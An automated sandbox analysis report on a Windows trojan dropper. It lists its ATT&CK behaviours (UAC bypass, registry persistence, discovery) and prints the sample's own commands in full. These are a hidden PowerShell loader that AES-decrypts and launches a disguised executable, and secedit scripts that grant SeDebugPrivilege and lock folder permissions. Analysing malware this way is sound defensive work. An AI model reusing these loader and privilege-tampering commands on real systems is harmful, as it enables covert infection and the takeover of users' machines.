a0127c6b20e18d62795ff85d076c30b6aee74142979fe0e0b5ef4bdd8e35ac25

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
22-11-2024 11:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a0127c6b20e18d62795ff85d076c30b6aee74142979fe0e0b5ef4bdd8e35ac25N.exe
Size

6.5MB
MD5

404fc7178fb12b86408b94a29b5b4520
SHA1

377d56f41d8945c35ee678eaf016c5a05370482a
SHA256

a0127c6b20e18d62795ff85d076c30b6aee74142979fe0e0b5ef4bdd8e35ac25
SHA512

9fcdcb23ae29c7059d6247c8942058188394700091cb79b1aef0c6a12914b43d14edfc29b42f03190beabde9c570311a91121515a8afa1184d57c8809fa796ef
SSDEEP

98304:QhyJPZYxnMe4V/cJtKpGvJc5twG9Nh0hxblrrVPZl:QoIxMe4cxhAYbrrVPZl

Score

10^/10

defense_evasion discovery evasion execution persistence trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	iusb3mon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1404	powershell.exe
2680	powershell.exe
2580	powershell.exe
640	powershell.exe
1860	powershell.exe
752	powershell.exe
2680	powershell.exe
1976	powershell.exe
2496	powershell.exe
2880	powershell.exe
2460	powershell.exe
2632	powershell.exe
2592	powershell.exe
2924	powershell.exe
2584	powershell.exe
2584	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Executes dropped EXE 3 IoCs

pid	Process
2320	irsetup.exe
1212	Process not Found
2896	iusb3mon.exe

Loads dropped DLL 4 IoCs

pid	Process
2368	a0127c6b20e18d62795ff85d076c30b6aee74142979fe0e0b5ef4bdd8e35ac25N.exe
2320	irsetup.exe
1212	Process not Found
2320	irsetup.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000b000000016d5a-104.dat	upx
behavioral1/memory/2896-106-0x0000000000400000-0x000000000053F000-memory.dmp	upx
behavioral1/memory/2896-286-0x0000000000400000-0x000000000053F000-memory.dmp	upx

Drops file in Program Files directory 11 IoCs

description	ioc	Process
File created	C:\Program Files\product1\Uninstall\uniBD18.tmp	irsetup.exe
File opened for modification	C:\Program Files\product1\Uninstall\uninstall.xml	irsetup.exe
File created	C:\Program Files\product1\Uninstall\IRIMG1.JPG	irsetup.exe
File opened for modification	C:\Program Files\product1\Uninstall\IRIMG1.JPG	irsetup.exe
File created	C:\Program Files\product1\lua5.1.dll	irsetup.exe
File created	C:\Program Files\product1\Uninstall\uninstall.xml	irsetup.exe
File created	C:\Program Files\product1\Uninstall\IRIMG2.JPG	irsetup.exe
File opened for modification	C:\Program Files\product1\Uninstall\uniBD18.tmp	irsetup.exe
File opened for modification	C:\Program Files\product1\Uninstall\uninstall.dat	irsetup.exe
File created	C:\Program Files\product1\Uninstall\uninstall.dat	irsetup.exe
File created	C:\Program Files\product1\uninstall.exe	irsetup.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 7 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
752	powershell.exe
2680	powershell.exe
1404	powershell.exe
2680	powershell.exe
2580	powershell.exe
1976	powershell.exe
2496	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iusb3mon.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	iusb3mon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	iusb3mon.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2108	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
2320	irsetup.exe
1404	powershell.exe
2584	powershell.exe
2580	powershell.exe
2680	powershell.exe
1976	powershell.exe
2496	powershell.exe
2584	powershell.exe
2584	powershell.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2880	powershell.exe
640	powershell.exe
1860	powershell.exe
2460	powershell.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe
2896	iusb3mon.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2320	irsetup.exe
2320	irsetup.exe
2896	iusb3mon.exe
2896	iusb3mon.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 2320	2368	a0127c6b20e18d62795ff85d076c30b6aee74142979fe0e0b5ef4bdd8e35ac25N.exe	30
PID 2368 wrote to memory of 2320	2368	a0127c6b20e18d62795ff85d076c30b6aee74142979fe0e0b5ef4bdd8e35ac25N.exe	30
PID 2368 wrote to memory of 2320	2368	a0127c6b20e18d62795ff85d076c30b6aee74142979fe0e0b5ef4bdd8e35ac25N.exe	30
PID 2320 wrote to memory of 2584	2320	irsetup.exe	32
PID 2320 wrote to memory of 2584	2320	irsetup.exe	32
PID 2320 wrote to memory of 2584	2320	irsetup.exe	32
PID 2320 wrote to memory of 1404	2320	irsetup.exe	34
PID 2320 wrote to memory of 1404	2320	irsetup.exe	34
PID 2320 wrote to memory of 1404	2320	irsetup.exe	34
PID 2320 wrote to memory of 2580	2320	irsetup.exe	36
PID 2320 wrote to memory of 2580	2320	irsetup.exe	36
PID 2320 wrote to memory of 2580	2320	irsetup.exe	36
PID 2320 wrote to memory of 2680	2320	irsetup.exe	38
PID 2320 wrote to memory of 2680	2320	irsetup.exe	38
PID 2320 wrote to memory of 2680	2320	irsetup.exe	38
PID 2320 wrote to memory of 1976	2320	irsetup.exe	40
PID 2320 wrote to memory of 1976	2320	irsetup.exe	40
PID 2320 wrote to memory of 1976	2320	irsetup.exe	40
PID 2320 wrote to memory of 2496	2320	irsetup.exe	42
PID 2320 wrote to memory of 2496	2320	irsetup.exe	42
PID 2320 wrote to memory of 2496	2320	irsetup.exe	42
PID 2584 wrote to memory of 2896	2584	powershell.exe	44
PID 2584 wrote to memory of 2896	2584	powershell.exe	44
PID 2584 wrote to memory of 2896	2584	powershell.exe	44
PID 2584 wrote to memory of 2896	2584	powershell.exe	44
PID 2584 wrote to memory of 2896	2584	powershell.exe	44
PID 2584 wrote to memory of 2896	2584	powershell.exe	44
PID 2584 wrote to memory of 2896	2584	powershell.exe	44
PID 2896 wrote to memory of 2460	2896	iusb3mon.exe	45
PID 2896 wrote to memory of 2460	2896	iusb3mon.exe	45
PID 2896 wrote to memory of 2460	2896	iusb3mon.exe	45
PID 2896 wrote to memory of 2460	2896	iusb3mon.exe	45
PID 2896 wrote to memory of 1860	2896	iusb3mon.exe	46
PID 2896 wrote to memory of 1860	2896	iusb3mon.exe	46
PID 2896 wrote to memory of 1860	2896	iusb3mon.exe	46
PID 2896 wrote to memory of 1860	2896	iusb3mon.exe	46
PID 2896 wrote to memory of 2880	2896	iusb3mon.exe	48
PID 2896 wrote to memory of 2880	2896	iusb3mon.exe	48
PID 2896 wrote to memory of 2880	2896	iusb3mon.exe	48
PID 2896 wrote to memory of 2880	2896	iusb3mon.exe	48
PID 2896 wrote to memory of 640	2896	iusb3mon.exe	50
PID 2896 wrote to memory of 640	2896	iusb3mon.exe	50
PID 2896 wrote to memory of 640	2896	iusb3mon.exe	50
PID 2896 wrote to memory of 640	2896	iusb3mon.exe	50
PID 2896 wrote to memory of 952	2896	iusb3mon.exe	53
PID 2896 wrote to memory of 952	2896	iusb3mon.exe	53
PID 2896 wrote to memory of 952	2896	iusb3mon.exe	53
PID 2896 wrote to memory of 952	2896	iusb3mon.exe	53
PID 640 wrote to memory of 1996	640	powershell.exe	55
PID 640 wrote to memory of 1996	640	powershell.exe	55
PID 640 wrote to memory of 1996	640	powershell.exe	55
PID 640 wrote to memory of 1996	640	powershell.exe	55
PID 1860 wrote to memory of 1276	1860	powershell.exe	56
PID 1860 wrote to memory of 1276	1860	powershell.exe	56
PID 1860 wrote to memory of 1276	1860	powershell.exe	56
PID 1860 wrote to memory of 1276	1860	powershell.exe	56
PID 2880 wrote to memory of 2456	2880	powershell.exe	58
PID 2880 wrote to memory of 2456	2880	powershell.exe	58
PID 2880 wrote to memory of 2456	2880	powershell.exe	58
PID 2880 wrote to memory of 2456	2880	powershell.exe	58
PID 2460 wrote to memory of 2532	2460	powershell.exe	57
PID 2460 wrote to memory of 2532	2460	powershell.exe	57
PID 2460 wrote to memory of 2532	2460	powershell.exe	57
PID 2460 wrote to memory of 2532	2460	powershell.exe	57

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	iusb3mon.exe

C:\Users\Admin\AppData\Local\Temp\a0127c6b20e18d62795ff85d076c30b6aee74142979fe0e0b5ef4bdd8e35ac25N.exe
"C:\Users\Admin\AppData\Local\Temp\a0127c6b20e18d62795ff85d076c30b6aee74142979fe0e0b5ef4bdd8e35ac25N.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
  "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5844850 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\a0127c6b20e18d62795ff85d076c30b6aee74142979fe0e0b5ef4bdd8e35ac25N.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-3551809350-4263495960-1443967649-1000"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command function Copy-Stream { param( [IO.Stream]$FromStream, [IO.Stream]$ToStream ) $buff = New-Object 'byte[]' -ArgumentList 80kb while (($readCount = $FromStream.Read($buff, 0, $buff.Length)) -gt 0) { $ToStream.Write($buff, 0, $readCount) } } function Get-FixedBytes { param( [byte[]]$Bytes, [int]$Size ) if ($Bytes.Length -eq $Size) { return , $Bytes } if ($Bytes.Length -gt $Size) { return , $Bytes[0..($Size - 1)] } return , ($Bytes + (New-Object 'byte[]' ($Size - $Bytes.Length) )) } function Unprotect-AesData { [CmdletBinding()] param ( [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [string[]]$FromFile, [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Alias(\"PSPath\")] [string[]]$FromLiteralFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, Position = 1)] [string]$ToFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $false)] [switch]$Append, [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [System.IO.Stream[]]$FromStream, [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, Position = 1)] [System.IO.Stream]$ToStream, [ValidateSet(128, 192, 256)] [int]$KeySize = 256, [System.Security.Cryptography.CipherMode]$Mode = [System.Security.Cryptography.CipherMode]::CBC, [System.Security.Cryptography.PaddingMode]$Padding = [System.Security.Cryptography.PaddingMode]::PKCS7, [byte[]]$Key1, [byte[]]$IV1, [System.Security.SecureString]$Password, [byte[]]$PasswordBytes, [string]$PasswordPlain, [ValidateNotNullOrEmpty()] [ValidateCount(8, 2147483647)] [byte[]]$Salt = (200, 78, 178, 161, 117, 108, 182, 25, 83, 212, 170, 163, 245, 143, 72, 180, 117, 109, 100, 180, 172, 49, 207, 73, 78, 231, 183, 46, 143, 113, 43, 64), [int]$Iteration = 1000, [ValidateNotNullOrEmpty()] [string]$KeyHashAlg = 'SHA1' ) begin { $formatDebug = \"NamedBlock = {0,-10}, ParameterSetName = {1}\" $PSCmdlet.WriteDebug(($formatDebug -f \"begin\", $PSCmdlet.ParameterSetName)) # if (-not ($PSBoundParameters.ContainsKey('Password') -xor $PSBoundParameters.ContainsKey('PasswordBytes'))) { # throw \"Parameter 'Password' and 'PasswordBytes' must be bounded to only one, not both.\" # } try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding if ($null -ne $Key1) { $aes.Key = Get-FixedBytes -Bytes $Key1 -Size ($aes.KeySize / 8) if ($null -ne $IV1) { $aes.IV = Get-FixedBytes -Bytes $IV1 -Size ($aes.BlockSize / 8) } } else { try { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration, [System.Security.Cryptography.HashAlgorithmName]$KeyHashAlg) } catch { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration) #for ps2.0 } $aes.Key = $keyGen.GetBytes($aes.KeySize / 8) $aes.IV = $keyGen.GetBytes($aes.BlockSize / 8) } $Key1 = $aes.Key $IV1 = $aes.IV if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $filemode = if ($Append) { [System.IO.FileMode]::Append }else { [System.IO.FileMode]::Create } $ToStream = New-Object System.IO.FileStream -ArgumentList ($ToFile, $filemode, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None) -ErrorAction Stop } } catch { if ($ToFile -and $ToStream) { $ToStream.Close() } throw } finally { if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } process { $PSCmdlet.WriteDebug(($formatDebug -f \"process\", $PSCmdlet.ParameterSetName)) if (\"FromStreamToFile\", \"FromStreamToStream\" -contains $PSCmdlet.ParameterSetName) { foreach ($itemStream in $FromStream) { try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() try { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read, $true) } catch { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) } # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } return } foreach ($apath in $(if (\"FromFileToFile\", \"FromFileToStream\" -contains $PSCmdlet.ParameterSetName) { Convert-Path -Path $FromFile } else { Convert-Path -LiteralPath $FromLiteralFile })) { try { $itemStream = New-Object System.IO.FileStream -ArgumentList ($apath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read) [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($itemStream) { $itemStream.Close() Clear-Variable -Name itemStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } } end { $PSCmdlet.WriteDebug(($formatDebug -f \"end\", $PSCmdlet.ParameterSetName)) if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $ToStream.Close() } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } # main $FromLiteralFile = \"C:\ProgramData\Program\Uninstall_.exe\" $ToFile = \"C:\ProgramData\Program\iusb3mon.exe\" $PasswordPlain = \"123\" if ($FromLiteralFile -ne $ToFile) { Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $ToFile -PasswordPlain $PasswordPlain } else { #inplace $fi0 = Get-Item -LiteralPath $FromLiteralFile -ErrorAction SilentlyContinue if ($null -ne $fi0) { $tmpfile = [IO.Path]::GetTempFileName() Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $tmpfile -PasswordPlain $PasswordPlain if ($?) { Move-Item -LiteralPath $tmpfile -Destination $ToFile -Force } } } #ps1Ö´ÐÐexe Start-Process -FilePath $ToFile -ArgumentList '$false' -WorkingDirectory ([IO.Path]::GetDirectoryName($ToFile)) -WindowStyle Hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2584
  - - C:\ProgramData\Program\iusb3mon.exe
      "C:\ProgramData\Program\iusb3mon.exe" $false
      4⤵
      UAC bypass
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:2896
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2460
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2532
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1860
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1276
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
